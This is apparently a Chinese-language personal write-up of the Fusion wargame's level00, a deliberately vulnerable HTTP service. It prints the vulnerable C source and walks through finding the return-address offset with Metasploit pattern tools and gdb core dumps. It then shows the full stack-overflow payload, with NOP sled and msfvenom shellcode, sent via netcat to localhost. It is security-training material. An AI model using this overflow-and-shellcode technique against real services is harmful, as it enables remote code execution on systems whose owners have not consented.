经过半个多月的时间把Protostar完成了,休息了几天,继续做Fusion。

*********题外话开始**********

在大学期间就在纠结是否选择程序猿的道路,结果因长时间高负荷写代码会引发不适而放弃了,不得不赞一下调好一个BUG时那种feel。如今,当完成一道题目也会有这种feel~~~~

*********题外话结束**********

level00源码:

#include "../common/common.c"
int fix_path(char *path)
{
 char resolved[128];
 if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
 strcpy(path, resolved);
}
char *parse_http_request()
{
 char buffer[1024];
 char *path;
 char *q;
 printf("[debug] buffer is at 0x%08x :-)\n", buffer);
 if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
 if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");
 path = &buffer[4];
 q = strchr(path, ' ');
 if(! q) errx(0, "No protocol version specified");
 *q++ = 0;
 if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");
 fix_path(path);
 printf("trying to access %s\n", path);
 return path;
}
int main(int argc, char **argv, char **envp)
{
 int fd;
 char *p;
 background_process(NAME, UID, GID);
 fd = serve_forever(PORT);
 set_io(fd);
 parse_http_request();
}

Fusion的题目是Protostar的进阶版,难度也更难了,当然,level00还是个热身题。通过题目提示知道是个Stack问题,而且shellcode应该放在resolved之外。


既然是Stack问题,那就来个长点的字符串吧。

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

######################################################################

# 修改core文件生成路径的方法是: #

# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' #

######################################################################

通过gdb来查看core文件

fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639
[sudo] password for fusion:
[New LWP 2495]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0x65413665 in ?? ()
(gdb)

用pattern_offset.rb工具:

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665
139

由此可以得到溢出的字符修改EIP的位置在长度139的位置

接下来需要在输入中放进shellcode,通过core文件找到shellcode的位置。

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

***************

fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
.
[New LWP 2833]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0xdeadbeef in ?? ()
(gdb) x/200x 0xbf89b340
0xbf89b340:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b350:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b360:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b370:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b380:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b390:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3a0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3b0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3c0:     0x61616161      0x61616161      0xdeadbeef      0x54544800
0xbf89b3d0:     0x2e312f50      0x90909031      0x90909090      0x90909090
0xbf89b3e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b3f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b400:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b410:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b420:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b430:     0x90909090      0x90909090      0x61616190      0x61616161
0xbf89b440:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b450:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b460:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b470:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b480:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b490:     0x0a616161      0x00000004      0xb77bc6e0      0x00000000


可以得到写的字符串从0xbf89b3d5开始记录。同样,在shellcode前面填充一些0x90。因此得到的payload格式应该是这样的:

GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.10x90……0x90[SHELLCODE]

先获得一个shellcode:

fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"
[sudo] password for fusion:
my $buf =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" .
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" .
"\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" .
"\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" .
"\x53\x89\xe1\xcd\x80";


于是乎:

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)
fusion@fusion:/tmp$ ll
total 912
drwxrwxrwt 4 root  root     340 2013-05-11 17:30 ./
drwxr-xr-x 1 root  root     240 2013-05-11 22:50 ../
-rw------- 1 root  20000 196608 2013-05-11 15:03 core.1368248639
-rw------- 1 root  20000 196608 2013-05-11 15:33 core.1368250392
-rw------- 1 root  20000 196608 2013-05-11 15:36 core.1368250571
-rw------- 1 root  20000 196608 2013-05-11 15:41 core.1368250870
-rw------- 1 root  20000 196608 2013-05-11 15:46 core.1368251166
-rw------- 1 root  20000 196608 2013-05-11 15:51 core.1368251470
-rw------- 1 root  20000 196608 2013-05-11 16:02 core.1368252121
-rw------- 1 root  20000 196608 2013-05-11 17:02 core.1368255737
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256578
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256609
-rw------- 1 root  20000 196608 2013-05-11 17:19 core.1368256755
-rw------- 1 root  20000 196608 2013-05-11 17:24 core.1368257093
-rw-r--r-- 1 20000 20000      0 2013-05-11 17:30 fusion_for_zsz
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .ICE-unix/
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .X11-unix/